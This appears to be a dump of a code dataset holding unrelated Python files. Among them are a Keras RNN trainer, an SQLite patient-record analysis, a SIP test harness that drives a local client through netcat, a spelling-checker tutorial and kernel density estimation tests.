m.add(LeakyReLU(alpha=leakyAlpha))
#compile and return model
#default is mean squared error and the Nadam optimizer
#(Adam RMSprop + nesterov momentum)
m.compile(loss=lossFunc, optimizer=opt)
return m
def train_Net(xTrain, yTrain, xTest, yTest, model,
batchSize=500, numEpochs=3000, verbose=1, showStep=10):
'''
trains the provided model with the training data and verifies the
generalizability of the model by graphing the training data versus
the model's prediction, returns the trained model.
If verbose is set to 1, then this graph will be displayed every "showStep"
time steps, if verbose is set to 0, then the graph will only be displayed
at the end of training
xTrain, yTrain, xTest, yTest - training and testing data, received from
read_Data()
model - model to be trained, built by RNN()
batchSize - how large each batch should be
numEpochs - how many time steps the training occurs for
verbose - controls how much information is displayed
showStep - controls how often the model's prediction is graphed against the
actual test data, only occurs if verbose is set to 1
'''
if verbose==1:
for i in range(0, numEpochs, showStep):
#run "showStep" more training steps
model.fit(
xTrain,
yTrain,
validation_split=0.05,
batch_size=512,
epochs=showStep+i,
initial_epoch = i)
#calculate the model's prediction on the test data
predicted = model.predict(xTest)
predicted = np.reshape(predicted, (predicted.size,))
#set x axis
length = len(predicted)
x_s = np.linspace(0, length-1, num=length, endpoint=True)
#plot the test data against the prediction
plt.clf()
plt.plot(x_s, predicted, "-" , x_s, yTest, "-")
plt.legend(labels=["Predicted", "Test data"])
plt.draw()
plt.pause(0.0001)
else:
#run all training steps
model.fit(
xTrain,
yTrain,
validation_split=0.05,
batch_size=512,
epochs=numEpochs,
verbose=2)
#calculate the model's prediction on the test data
predicted = model.predict(xTest)
predicted = np.reshape(predicted, (predicted.size,))
#set x axis
length = len(predicted)
x_s = np.linspace(0, length-1, num=length, endpoint=True)
#plot the test data against the prediction
plt.clf()
plt.plot(x_s, predicted, "-" , x_s, yTest, "-")
plt.legend(labels=["predicted", "actual"])
plt.show()
#return trained model
return model
sampleLength = 120
xTrain, yTrain, xTest, yTest = read_Data(sampleLength)
model = RNN([1, sampleLength, sampleLength, 1])
trainedModel = train_Net(xTrain, yTrain, xTest, yTest, model)
|
996,847 | c0607656e12ed3ce924e48c839603f0954374588 | """Change EHR analysis to work with SQLite database."""
import datetime as dt
import sqlite3
import os
DAYS_IN_YEAR = 365.25
"""Create database to store data and open connection"""
if os.path.exists("ehr.db"):
os.remove("ehr.db")
con = sqlite3.connect("ehr.db")
def parse_patient_data(filename: str):
"""Parse patient data into SQLite datbase"""
cur = con.cursor()
cur.execute(
"""CREATE TABLE Patient (
[Patient_ID] INTEGER PRIMARY KEY,
[Gender] VARCHAR(10),
[Date_Of_Birth] VARCHAR(10),
[Race] VARCHAR(20))"""
)
with open(filename) as file:
next(file) # O(1)
for line in file: # N times
content = line.split("\t") # O(1)
content[2] = content[2].split()[0]
cur.execute("INSERT INTO Patient VALUES (?, ?, ?, ?)", content[:4])
return
def parse_lab_data(filename: str):
"""Parse lab data into SQLite database"""
cur = con.cursor()
cur.execute(
"""CREATE TABLE Lab (
[Patient_ID] INTEGER PRIMARY KEY,
[Admission_ID] INTEGER,
[Lab_Name] VARCHAR(70),
[Lab_Value] DECIMAL(6,2),
[Lab_Units] VARCHAR(20),
[Lab_Date] VARCHAR(10))"""
)
with open(filename) as file:
next(file) # O(1)
for line in file: # NM times
content = line.split("\t") # O(1)
content[3] = float(content[3])
content[5] = content[5].split()[0]
cur.execute("INSERT INTO Lab VALUES (?, ?, ?, ?, ?, ?)", content)
return
def num_older_than(age: float) -> int:
"""Count number of patients older than a user-defined age. We assume that
date of birth is the third column in the patients text file."""
cur = con.cursor()
count_older = cur.execute(
"""SELECT COUNT(Patient_ID)
FROM Patient
WHERE (JULIANDAY('now') - JULIANDAY(Date_Of_Birth)) / ? > ?""",
[DAYS_IN_YEAR, age],
).fetchall()
return count_older[0][0]
def sick_patients(lab: str, gt_lt: str, value: float) -> set[int]:
"""Get list of patients that had an observation based on the outcome of a
certain lab. Assume that the lab name and the lab value are the 3rd and 4th
columns."""
cur = con.cursor()
output = cur.execute(
f"""SELECT DISTINCT(Patient_ID)
FROM Lab
WHERE Lab_Name = ?
AND Lab_Value {gt_lt} {value}""",
[lab],
).fetchall()
patient_IDs: set[str] = set() # O(1)
for row in output:
patient_IDs.add(row[0])
return patient_IDs # O(1)
def age_first_admission(patient_id: str) -> int:
"""Find patient age when first admitted"""
cur = con.cursor()
cache: dict[str, int] = {}
if patient_id in cache:
return cache[patient_id]
age = cur.execute(
"""SELECT (JULIANDAY(Lab_Date) - JULIANDAY(Date_Of_Birth)) / ?
FROM Lab l
INNER JOIN Patient p ON l.Patient_ID = p.Patient_ID
WHERE l.Patient_ID = ?
AND Admission_ID = 1""",
[DAYS_IN_YEAR, patient_id],
).fetchall()
age_as_int = int(age[0][0])
cache[patient_id] = age_as_int
return age_as_int # O(1)
def age(patient_id: str) -> int:
"""Find patient age."""
cur = con.cursor()
cache: dict[str, int] = {}
if patient_id in cache:
return cache[patient_id]
age = cur.execute(
"""SELECT (JULIANDAY('now') - JULIANDAY(Date_Of_Birth)) / ?
FROM Patient
WHERE Patient_ID = ?""",
[DAYS_IN_YEAR, patient_id],
).fetchall()
age_as_int = int(age[0][0])
cache[patient_id] = age_as_int
return age_as_int # O(1)
|
996,848 | 3f76f62b60cf04214b9794384b388cb81d4f64a8 | from src.collect.google.get_places_from_google_api import get_google_places_for_current_of_higene_data_establishments
from src.collect.google.combine_to_overall_and_comments import combine_google_found_to_overall
from util import setup_logger
google_logger = setup_logger("google")
def get_and_combine_to_overall():
for la in local_authorities:
google_logger.debug("on city: {}".format(la))
get_google_places_for_current_of_higene_data_establishments(la)
combine_google_found_to_overall()
local_authorities= [
#"Southampton",
#"Corby",
#"Hinckley and Bosworth",
#"Rossendale",
#"Wiltshire",
#"Guildford",
#"Darlington",
# "Barnsley",
# "North Lincolnshire",
#"Hart",
"Shropshire",
"Chelmsford",
"Horsham",
"Islington",
"Newport",
"Craven",
"Dartford",
"Mid Devon",
"Ipswich",
"Tameside",
"Epsom and Ewell",
"Worthing",
"Hackney",
"Croydon",
"Runnymede",
"Rotherham",
"Gloucester City",
"Selby",
"Stevenage",
"York",
"West Devon",
"West Oxfordshire",
"Trafford",
"Shetland Islands",
"North Somerset",
"Fenland",
"North Dorset",
"Swansea",
"Rochford",
"Bridgend",
"Tandridge",
"Solihull",
"Liverpool",
"Hertsmere",
"Lichfield",
"Stratford-on-Avon",
"Fife",
"Bolton",
"Allerdale",
"Test Valley",
"Tonbridge and Malling",
"South Staffordshire",
"Ashford",
"North Devon",
"Angus",
"Carmarthenshire",
"South Oxfordshire",
"South Ayrshire",
"East Renfrewshire",
"Breckland",
"Anglesey",
"St Albans City",
"South Cambridgeshire",
"Lincoln City",
"Nuneaton and Bedworth",
"Rutland",
"North Norfolk",
"Cardiff",
"Warwick",
"Wyre",
"Perth and Kinross",
"Blackpool",
"Waveney",
"Hillingdon",
"Castle Point",
"West Berkshire",
"Ceredigion",
"Forest Heath",
"Blaby",
"Maldon",
"Wandsworth",
"Moray",
"East Cambridgeshire",
"Norwich City",
"Barrow-in-Furness",
"East Riding of Yorkshire",
"South Northamptonshire",
"East Hertfordshire",
"Gateshead",
"Merton",
"Lewes",
"Melton",
"Broadland",
"Preston",
"Bury",
"Bolsover",
"Hounslow",
"Reading",
"Windsor and Maidenhead",
"West Lothian",
"Bradford",
"Wychavon",
"Carlisle City",
"Christchurch",
"Greenwich",
"City of London Corporation",
"Boston",
"Rhondda Cynon Taf",
"Wycombe",
"Cherwell",
"Oldham",
"King's Lynn and West Norfolk",
"Southwark",
"Aylesbury Vale",
"South Kesteven",
"Midlothian",
"Stoke-On-Trent",
"Cannock Chase",
"North East Lincolnshire",
"Bromley",
"Conwy",
"Stockton On Tees",
"Sefton",
"Dumfries and Galloway",
"Canterbury City",
"Derry City and Strabane",
"Bristol",
"Huntingdonshire",
"Worcester City",
"Flintshire",
"Bromsgrove",
"Isle of Wight",
"Winchester City",
"Falkirk",
"Doncaster",
"Newham",
"Swindon",
"Weymouth and Portland",
"Rother",
"Watford",
"Waltham Forest",
"Bassetlaw",
"Causeway Coast and Glens",
"Clackmannanshire",
"Braintree",
"Newry, Mourne and Down",
"South Lanarkshire",
"Hambleton",
"Kingston-Upon-Thames",
"Orkney Islands",
"Great Yarmouth",
"Birmingham",
"Gedling",
"West Somerset",
"Waverley",
"Medway",
"Argyll and Bute",
"Elmbridge",
"Harlow",
"Stafford",
"Sevenoaks",
"Rugby",
"Scottish Borders",
"Broxtowe",
"Suffolk Coastal",
"Spelthorne",
"Camden"
]
if __name__ == "__main__":
get_and_combine_to_overall() |
996,849 | c0271f309da2be7d5c93a5e2d2177ff421883953 | #-*- coding=utf-8 -*-
#author: zhihua.ye@spreadtrum.com
"""
1. assemble sipp cmd
sipp -sf reg.xml -p 5060 -t u1 -m 1 -trace_err
2. assemble tmtc cmd
echo -n "c-reg" | busybox nc 127.0.0.1 21904
"""
import sys
import json
import os
from logConf import *
from utjsonparser import *
from time import gmtime, strftime
import re
class CmdException(Exception):
def __init__(self, message):
super(CmdException, self).__init__(message)
self.message = message
class cmdObj(dict):
def __init__(self, *arg, **kw):
self['cmd'] = ''
self['timeout'] = 1
super(cmdObj, self).__init__(*arg, **kw)
class cmdhelper:
def __init__(self, confdir=''):
self.confdir = confdir
self.config = dict()
self.logger = logConf()
conffile = os.path.realpath(confdir) + '/config.json'
self.timestamp = strftime("%Y_%m_%d_%H_%M_%S", gmtime())
try:
with open(conffile, 'r') as conf:
self.config = json.load(conf)
except:
etype = sys.exc_info()[0]
evalue = sys.exc_info()[1]
estr = str(etype) +' '+str(evalue)
self.logger.logger.error("Unexpected error:"+ estr)
raise(CmdException(estr))
self.execdir = ''
#extract info
self.xmls = list()
self.timeouts = list()
#real cmd list
self.sippcmds = list()
self.nccmds = list()
#ugly var
self.termcmd = None
def gettimestamp(self):
return self.timestamp
def getDesc(self):
desc = self.config['description']
self.logger.logger.info('scenario is ' + desc['scenario'])
self.logger.logger.info('bug id is ' + str(desc['bugid']) + ', commit id is '+ str(desc['commitid']))
def getCasename(self):
return self.config['description']['casename']
def getCategory(self):
return self.config['description']['category']
def getConfDelta(self):
"""
provision.ini delta value
:return:
"""
pass
def getUeConfig(self):
ueconfig = dict()
ueconfig['tmtcport'] = 21904
#if there is space in casename, replace it with _
newcasename = re.sub(r'[\s+]', '_', self.config['description']['casename'])
postfix = newcasename + '_' + self.timestamp
ueconfig['execdir'] = "/data/data/ut/" + postfix
ueconfig['config'] = "provision.ini"
ueconfig['binary'] = 'tmtclient'
ueconfig['startuptime'] = 3
ueconfig['lib'] = [
"libavatar_ut.so",
"liblemon_ut.so"
]
ueconfig['preference'] = dict()
if 'preference' in self.config['ue']:
ueconfig['preference'] = self.config['ue']['preference']
if 'tmtcport' in self.config['ue']:
ueconfig['tmtcport'] = self.config['ue']['tmtcport']
if 'execdir' in self.config['ue']:
ueconfig['execdir'] = self.config['ue']['execdir'] + postfix
if 'config' in self.config['ue']:
ueconfig['config'] = self.config['ue']['config']
if 'binary' in self.config['ue']:
ueconfig['binary'] = self.config['ue']['binary']
if 'lib' in self.config['ue']:
ueconfig['lib'] = self.config['ue']['lib']
if 'startuptime' in self.config['ue']:
ueconfig['startuptime'] = self.config['ue']['startuptime']
self.execdir = ueconfig['execdir']
return ueconfig
def buildCmd(self):
cases = self.config['cases']
for index,case in enumerate(cases):
try:
#init
sippcmd = cmdObj()
nccmd = cmdObj()
xml = case['xml']
timeout = case['timeout']
tmtccmd = case['tmtccmd']
desc = case['desc']
opts = ''
if 'opts' in case:
opts = case['opts']
self.xmls.append(xml)
self.timeouts.append(timeout)
if validCmd(tmtccmd) is False:
tmtccmd = None
if xml:
sippcmd = self.buildsipp(xml, timeout,desc, opts=opts)
self.sippcmds.append(sippcmd)
if tmtccmd:
nccmd = self.buildnc(tmtccmd)
self.nccmds.append(nccmd)
else:
#just keep nccmd the same number as sipcmd
dummynccmd = cmdObj()
dummynccmd['cmd'] = DUMMY_CMD
self.nccmds.append(dummynccmd)
except:
#most likely KeyError
etype = sys.exc_info()[0]
evalue = sys.exc_info()[1]
estr = str(etype) +' '+str(evalue)
self.logger.logger.error("Unexpected error:" + estr)
raise(CmdException(estr))
def buildsipp(self, xml='', timeout=None, desc=None, opts=''):
"""
sipp -sf reg.xml -p 5060 -t u1 -m 1 -trace_err -trace_msg -message_file reg.msg -trace_shortmsg -shortmessage_file regshort.msg
sipp -sf mt_815908.xml 127.0.0.1:5065 -p 5060 -t u1 -m 1 -trace_err -trace_msg -message_file mt.msg -trace_shortmsg -shortmessage_file mtshort.msg
:return:
"""
#
sippcmd = cmdObj()
prefix = xml.split('.')[0]
msgopt = " -trace_msg -message_file " + str(prefix) + ".msg "
shortmsgopt = " -trace_shortmsg -shortmessage_file " + str(prefix) + "short.msg "
cdcmd = "cd " + self.execdir
sippcmd['cmd'] = cdcmd + "&& sipp -sf " + xml + ' ' + opts + ' -p 5060 -t u1 -m 1 -trace_err ' + msgopt + shortmsgopt
sippcmd['timeout'] = timeout
sippcmd['desc'] = desc
return sippcmd
def buildnc(self, cmd=''):
"""
adb shell echo -n "c-reg" | busybox nc 127.0.0.1 21904
use loopback device and tmtc listening on 21904
:return:
"""
tmtcport = 21904
if 'tmtcport' in self.config['ue']:
tmtcport = self.config['ue']['tmtcport']
nccmd = cmdObj()
nccmd['cmd'] = "echo -n " + cmd + ' | busybox nc 127.0.0.1 ' + str(tmtcport)
#FIXME: nc should be responsed quickly, hardcoded here.
nccmd['timeout'] = 1
return nccmd
def getxmls(self):
return self.xmls
def gettimeouts(self):
return self.timeouts
def getsippcmds(self):
return self.sippcmds
def getnccmds(self):
return self.nccmds
def gettermcmd(self):
self.termcmd = cmdObj()
tmtcport = 21904
if 'tmtcport' in self.config['ue']:
tmtcport = self.config['ue']['tmtcport']
self.termcmd['cmd'] = "echo -n exit" + ' | busybox nc 127.0.0.1 ' + str(tmtcport)
self.termcmd['timeout'] = 1
return self.termcmd
def printCmds(self):
for index, sipp in enumerate(self.sippcmds):
self.logger.logger.info("< Flow No." + str(index+1) + ' >')
self.logger.logger.info('sippcmd is ' + sipp['cmd'] + ', timeout is ' + str(sipp['timeout']))
self.logger.logger.info('netcat cmd is ' + self.nccmds[index]['cmd'] +
', timeout is ' + str(self.nccmds[index]['timeout']))
if __name__ == '__main__':
cmd = cmdhelper(confdir="../cases/mt/")
cmd.getDesc()
cmd.buildCmd()
ueconfig = cmd.getUeConfig()
cmd.printCmds()
|
996,850 | ca95509c5264c6257a233f094ad448358fcb2ff2 | Spelling checker in Python
For any type of text processing or analysis, checking the spelling of the word
is one of the basic requirements. This article discusses various ways that you
can check the spellings of the words and also can correct the spelling of the
respective word.
## Using textblob library
First, you need to install the library **textblob** using pip in command
prompt.
pip install textblob
You can also install this library in Jupyter Notebook as:
## Python3
__
__
__
__
__
__
__
import sys
!{sys.executable} - m pip install textblob
---
__
__
**Program for Spelling checker –**
## Python3
__
__
__
__
__
__
__
from textblob import TextBlob
a = "cmputr" # incorrect spelling
print("original text: "+str(a))
b = TextBlob(a)
# prints the corrected spelling
print("corrected text: "+str(b.correct()))
---
__
__
**Output:**
original text: cmputr
corrected text: computer
## Using pyspellchecker library
You can install this library as below:
**Using pip:**
pip install pyspellchecker
**In Jupyter Notebook:**
## Python3
__
__
__
__
__
__
__
import sys
!{sys.executable} - m pip install pyspellchecker
---
__
__
**Spelling Checker program using pyspellchecker –**
## Python3
__
__
__
__
__
__
__
from spellchecker import SpellChecker
spell = SpellChecker()
# find those words that may be misspelled
misspelled = spell.unknown(["cmputr", "watr", "study",
"wrte"])
for word in misspelled:
# Get the one most likely answer
print(spell.correction(word))
# Get a list of likely options
print(spell.candidates(word))
---
__
__
**Output:**
computer
{'caput', 'caputs', 'compute', 'computor', 'impute', 'computer'}
water
{'water', 'watt', 'warr', 'wart', 'war', 'wath', 'wat'}
write
{'wroe', 'arte', 'wre', 'rte', 'wrote', 'write'}
## Using JamSpell
To achieve the best quality while making spelling corrections dictionary-based
methods are not enough. You need to consider the word surroundings. JamSpell
is a python spell checking library based on a language model. It makes
different corrections for a different context.
1) Install swig3
apt-get install swig3.0 # for linux
brew install swig@3 # for mac
2) Install jamspell
pip install jamspell
3) Download a language model for your language
## Python3
__
__
__
__
__
__
__
# Create a corrector
corrector = jamspell.TSpellCorrector()
# Load Language model -
# argument is a downloaded model file path
corrector.LoadLangModel('Downloads/en_model.bin')
# To fix text automatically run FixFragment:
print(corrector.FixFragment('I am the begt spell cherken!'))
# To get a list of possible candidates
# pass a splitted sentence, and a word position
print(corrector.GetCandidates(['i', 'am', 'the', 'begt',
'spell', 'cherken'], 3))
print(corrector.GetCandidates(['i', 'am', 'the', 'begt',
'spell', 'cherken'], 5))
---
__
__
**Output:**
u'I am the best spell checker!'
(u'best', u'beat', u'belt', u'bet', u'bent')
(u'checker', u'chicken', u'checked', u'wherein', u'coherent', ...)
Attention geek! Strengthen your foundations with the **Python Programming
Foundation** Course and learn the basics.
To begin with, your interview preparations Enhance your Data Structures
concepts with the **Python DS** Course.
My Personal Notes _arrow_drop_up_
Save
|
996,851 | 56b1d183e0781351833a6e2a30e8e5aff899e436 | import psycopg2
import os
from urllib.parse import urlparse
url = urlparse(os.environ['DATABASE_URL'])
dbname = url.path[1:]
db = psycopg2.connect(dbname=dbname, user=url.username, password=url.password, host=url.hostname, port=url.port) |
996,852 | 8d24fc1ed4f59a01c2fe28a614697ac5bd0ac969 | def check_equal(str1, str2):
return str1 == str2
str1 = 'hei'
str2 = 'hello'
str3 = 'hello'
print(check_equal(str1, str2))
print(check_equal(str3, str2)) |
996,853 | ffee632df6dd2467eaaba69ada94a059fcba73cb | from my_home_server.models.user import User
class AuthenticationContext(object):
__authentication_context = None
@staticmethod
def init_context(user: User):
AuthenticationContext.__authentication_context = AuthenticationContext()
AuthenticationContext.__authentication_context.current_user = user
@staticmethod
def get_current_user() -> User:
return AuthenticationContext.__authentication_context.current_user
|
996,854 | 9c65b135d6566e780f451c5e1e4efb690576b323 | from enum import Enum
from pydantic import BaseModel
class MyException(Exception):
pass
class Index(str, Enum):
KeyRate = "Ключевая ставка"
USD = "Курс USD"
EURO = "Курс EURO"
CurrencyRate = "Курс обмена"
class Information:
def __init__(self, dt):
self.name = None
self.date = dt
self.value = None
class Config(BaseModel):
index: str = None
index_map = {
Index.KeyRate: 'http://www.cbr.ru/hd_base/KeyRate/',
Index.USD: 'http://www.cbr.ru/currency_base/dynamics/',
Index.EURO: 'http://www.cbr.ru/currency_base/dynamics/',
Index.CurrencyRate: 'http://www.cbr.ru/scripts/XML_daily.asp',
}
def get_url(self):
return self.index_map[self.index]
# 'http://www.cbr.ru/eng/currency_base/daily/'
# http://www.cbr.ru/scripts/XML_daily.asp?date_req=02/03/2002 |
996,855 | 35301682e0ed9e4fb98ee66a673f51f12b62fb59 | import argparse
import cv2
import matplotlib.pyplot as plt
import key_feature_extraction as key
def setup_cli():
parser = argparse.ArgumentParser()
parser.add_argument("path")
parser.add_argument("-c", "--canny", action="store_true")
parser.add_argument("-d", "--distance")
parser.add_argument("-f", "--fourier")
parser.add_argument("--centroid_off", action="store_false")
return parser.parse_args()
def view_single_key(img_path, centroid=True):
image = key.load_img(img_path)
contour = key.get_key_contour(image)
image = key.resize_img(image)
if centroid:
M = cv2.moments(contour)
cX = int(M["m10"] / M["m00"])
cY = int(M["m01"] / M["m00"])
cv2.circle(image, (cX, cY), 7, (0, 255, 0), -1)
key.view_contours(image, contour)
key.pause()
def view_single_key_canny(img_path):
image = key.load_img(img_path)
canny = key.preprocess_img(image)
key.show_img(canny)
key.pause()
def compare_dist(img_path_1, img_path_2):
key1 = key.load_img(img_path_1)
key2 = key.load_img(img_path_2)
contour1 = key.get_key_contour(key1)
center1 = key.find_center(contour1)
contour2 = key.get_key_contour(key2)
center2 = key.find_center(contour2)
dist1 = key.find_distances(contour1, center1)
dist1 = key.shift_distance_min(dist1)
dist2 = key.find_distances(contour2, center2)
dist2 = key.shift_distance_min(dist2)
plt.plot(dist1)
plt.plot(dist2)
plt.show()
def compare_fourier(img_path_1, img_path_2):
key1 = key.load_img(img_path_1)
key2 = key.load_img(img_path_2)
contour1 = key.get_key_contour(key1)
center1 = key.find_center(contour1)
contour2 = key.get_key_contour(key2)
center2 = key.find_center(contour2)
dist1 = key.find_distances(contour1, center1)
dist1 = key.shift_distance_min(dist1)
dist2 = key.find_distances(contour2, center2)
dist2 = key.shift_distance_min(dist2)
fft1 = key.fourier_transform(dist1)[:70]
fft1 = key.shift_distance_max(list(fft1))
fft2 = key.fourier_transform(dist2)[:70]
fft2 = key.shift_distance_max(list(fft2))
plt.plot(fft1)
plt.plot(fft2)
plt.show()
if __name__ == "__main__":
args = setup_cli()
if args.distance:
compare_dist(args.path, args.distance)
elif args.fourier:
compare_fourier(args.path, args.fourier)
elif args.canny:
view_single_key_canny(args.path)
else:
view_single_key(args.path, args.centroid_off)
|
996,856 | a3ade0a1697fde66c59795fa8aa20162ff8a8ab3 | import numpy as np
from progressivis.core.utils import (slice_to_arange, indices_len, fix_loc)
from . import Table
from . import TableSelectedView
from ..core.slot import SlotDescriptor
from .module import TableModule
from ..core.bitmap import bitmap
from .mod_impl import ModuleImpl
from .binop import ops
from collections import OrderedDict
class Percentiles(TableModule):
"""
"""
parameters = [('accuracy', np.dtype(float), 0.5)
]
def __init__(self, hist_index, scheduler=None, **kwds):
"""
"""
self._add_slots(kwds, 'input_descriptors',
[SlotDescriptor('table', type=Table, required=True),
SlotDescriptor('percentiles', type=Table, required=True)])
super(Percentiles, self).__init__(scheduler=scheduler, **kwds)
#self._impl = PercentilesImpl(self.params.accuracy, hist_index)
self._accuracy = self.params.accuracy
self._hist_index = hist_index
self.default_step_size = 1000
def compute_percentiles(self, points, input_table):
column = input_table[self._hist_index.column]
hii = self._hist_index._impl
def _filter_tsv(bm):
return bm & input_table.selection
def _no_filtering(bm):
return bm
_filter = _filter_tsv if isinstance(input_table,
TableSelectedView) else _no_filtering
len_ = len(input_table)
k_points = [p*(len_+1)*0.01 for p in points.values()]
max_k = max(k_points)
ret_values = []
k_accuracy = self._accuracy * len_ * 0.01
acc = 0
lbm = len(hii.bitmaps)
acc_list = np.empty(lbm, dtype=np.int64)
sz_list = np.empty(lbm, dtype=np.int64)
bm_list = []
for i, bm in enumerate(hii.bitmaps):
fbm = _filter(bm)
sz = len(fbm)
acc += sz
sz_list[i] = sz
acc_list[i] = acc
bm_list.append(fbm)
if acc > max_k:
break # just avoids unnecessary computes
acc_list = acc_list[:i+1]
#import pdb;pdb.set_trace()
for k in k_points:
i = (acc_list>=k).nonzero()[0][0]
reminder = int(acc_list[i] - k)
assert sz_list[i] > reminder >= 0
if sz_list[i] < k_accuracy:
#print("the fast way")
ret_values.append(column[bm_list[i][0]])
else:
#print("the accurate way")
values = column.loc[bm_list[i]]
part = np.partition(values, reminder)
ret_values.append(values[reminder])
return OrderedDict(zip(points.keys(), ret_values))
def run_step(self, run_number, step_size, howlong):
input_slot = self.get_input_slot('table')
input_slot.update(run_number)
steps = 0
if input_slot.deleted.any():
input_slot.deleted.next(step_size)
steps = 1
if input_slot.created.any():
input_slot.created.next(step_size)
steps = 1
if input_slot.updated.any():
input_slot.updated.next(step_size)
steps = 1
with input_slot.lock:
input_table = input_slot.data()
param = self.params
percentiles_slot = self.get_input_slot('percentiles')
percentiles_slot.update(run_number)
percentiles_changed = False
if percentiles_slot.deleted.any():
percentiles_slot.deleted.next()
if percentiles_slot.updated.any():
percentiles_slot.updated.next()
percentiles_changed = True
if percentiles_slot.created.any():
percentiles_slot.created.next()
percentiles_changed = True
if len(percentiles_slot.data()) == 0:
return self._return_run_step(self.state_blocked, steps_run=0)
if steps==0 and not percentiles_changed:
return self._return_run_step(self.state_blocked, steps_run=0)
if not self._hist_index._impl:
return self._return_run_step(self.state_blocked, steps_run=0)
computed = self.compute_percentiles(
percentiles_slot.data().last().to_dict(ordered=True),
input_slot.data())
if not self._table:
self._table = Table(name=None, dshape=percentiles_slot.data().dshape)
self._table.add(computed)
else:
self._table.loc[0, :] = list(computed.values())
return self._return_run_step(self.next_state(input_slot), steps_run=steps)
|
996,857 | 57421a8355d18c2893a9b8f6326c9526663e1904 | # -*- coding: utf-8 -*-
"""
Created on Mon May 21 15:22:39 2018
@author: Ramsey
"""
import numpy as np
import matplotlib.pyplot as plt
# get a bifurcation plot of x^2+c
# start with x = whatever, maybe 0?
def func(x, c):
return np.multiply(x,x) + c
lower_bound = -2
upper_bound = .25
step_size = .0001
initial_iterations = 10
final_iterations = 20
x_init = 0 # could change this to be random
#c = 0.4 - 0.325j
c = 0 + 0j
plt.plot([-1,0,1],[0,0,0],c="r")
plt.plot([0,0,0],[-1,0,1],c="r")
# let things settle to a steady state
num_points = 360
for xs in range(num_points):
yp = [ pow(2,0.5)/2 ]
xp = []
x = xs/5 - 1 + 1j*yp[0]
x = -pow(2,0.5)/2 +1j*yp[0]
x = np.cos(2*np.pi*xs/ num_points) + np.sin(2*xs*np.pi/num_points) * 1j
if abs(x) > 1:
continue
yp =[]
yp.append(x.imag)
xp.append(x.real)
print(x)
plt.scatter(x.real,x.imag)
for i in range(initial_iterations):
x = func(x, c)
xp.append(x.real)
yp.append(x.imag)
plt.scatter(x.real,x.imag)
plt.plot(xp,yp)
plt.show()
|
996,858 | 27995f9d9a2c76eea33d8e70204fd5e687f5e489 | arr = input().split(' ')
(a, b) = tuple((int(x) for x in arr))
area = a * b
circumference = (a + b) * 2
print(area, circumference) |
996,859 | dc047277174409e061d51dbdfff9ba635888c9db | #!/usr/bin/env python3
import numpy as np
import pytest
from sklearn.neighbors import NearestNeighbors
import deann
import sys
from extern.brute import BruteNN
from extern.faiss import FaissIVF
import time
def gaussian_kernel(q,X,h):
return np.exp(-np.sum((q[None,:]-X)**2,axis=1)/h/h/2)
def exponential_kernel(q,X,h):
return np.exp(-np.linalg.norm(q[None,:]-X,axis=1)/h)
def laplacian_kernel(q,X,h):
return np.exp(-np.linalg.norm(q[None,:]-X, 1, axis=1)/h)
def naive_kde(q, X, K, h):
(n,d) = X.shape
return np.mean(K(q,X,h))
def relative_error(wrong, correct):
return np.abs(wrong-correct)/correct
def construct_test_set():
N1 = 3737
N2 = 609
N = N1 + N2
assert N % 2 == 0
n = m = N//2
mu1 = np.array([46.49246863044118, -0.47588088931695965, 85.96002889477487,
0.16082082564143724, 41.49583968750836, 0.9723626829333547,
39.45937341145624, 44.44947427562405, 5.157770821628274])
A1 = np.array([[10.48441711263751, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.3964970383667547, 21.730310765493968, 0.0, 0.0, 0.0, 0.0,
0.0, 0.0, 0.0],
[3.4485084625657643, -0.28120939185823735, 8.57050385349843,
0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[-0.05130389161841126, -0.08261614921017782,
2.025124811423481, 34.80552047242849, 0.0, 0.0, 0.0, 0.0, 0.0],
[8.344024828411815, -0.030790194630293425,
-0.33708339870068904, 0.07328329343061195,
8.214712617983201, 0.0, 0.0, 0.0, 0.0],
[-0.03594926637950729, -0.7417873669876849,
-0.3153276829264685, 0.21607122879087798,
0.7254472592067689, 30.244917748649506, 0.0, 0.0, 0.0],
[-7.061282924462716, -0.2807508626111792, 8.531825490064175,
0.007605230963321018, -0.02816145276795588,
-0.006179511009823437, 0.5317477635530977, 0.0, 0.0],
[-4.844164935453136, -0.24415434388943516, 8.898715502133424,
-0.07811784341778047, -8.147890471517472,
-0.011989078614931445, 0.1842655678091983,
0.6704522457878629, 0.0],
[2.206335462583935, 0.03892495420779414, 0.3274019618648675,
-0.07720234409271014, -8.006262044202852,
0.04028908425200501, -0.22714713659168925,
0.4704157754390525, 0.6528722309151673]])
mu2 = np.array([58.96024314112042, 1.8997864300969278, 81.54476753737474,
0.8886150813208477, -8.273698045013964,
-2.2424839822572697, 22.510760637424017,
90.52998192870051, 67.98390011499917])
A2 = np.array([[16.065592111452954, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[4.009184067265925, 51.70302976271875, 0.0, 0.0, 0.0, 0.0,
0.0, 0.0, 0.0],
[1.8722216445930944, 0.08002264937499314, 4.650411850261695,
0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[-2.0057332330331543, 0.11165453494383987,
2.3276813178792555, 67.39430848603813, 0.0, 0.0, 0.0,
0.0, 0.0],
[-6.405410328832197, 1.9441154252900719, 3.467768467646764,
-0.4144368424064272, 14.541572107236027, 0.0, 0.0, 0.0,
0.0],
[3.592427751645286, -1.6136283180871827,
-5.6823579216710245, 6.399797684468458,
-0.008742434962222196, 96.21821018207623, 0.0, 0.0,
0.0],
[-14.239761076411021, 0.09365916755945296,
4.59040104584355, 0.002839284036579001,
0.0027681727245653298, 0.012371444953884297,
0.549654997829911, 0.0, 0.0],
[8.44884295589548, -1.911195319541577, 1.0658234673982725,
0.43735285474527746, -14.922878992826801,
0.011714016169396069, 0.19048151609840624,
0.69960090582502, 0.0],
[22.602748434210355, -2.0069000884320456,
-3.508134127959344, 0.43894223781589753,
-14.911426203496662, 0.009953869896377816,
-0.17085555729674284, 0.5764982581276846,
0.6740065987615914]])
d, = mu1.shape
assert mu2.shape == (d,)
assert A1.shape == (d,d)
assert A2.shape == (d,d)
rng = np.random.default_rng(271828)
Z = np.zeros((N,d))
for i in range(N1):
z = rng.standard_normal(d)
Z[i,:] = mu1 + A1.dot(z)
for i in range(N1,N):
z = rng.standard_normal(d)
Z[i,:] = mu2 + A2.dot(z)
ind = np.arange(N)
rng.shuffle(ind)
X_ind = ind[:n]
Y_ind = ind[n:]
return Z[X_ind,:], Z[Y_ind,:]
def kde_matmul_exp(query, data, h):
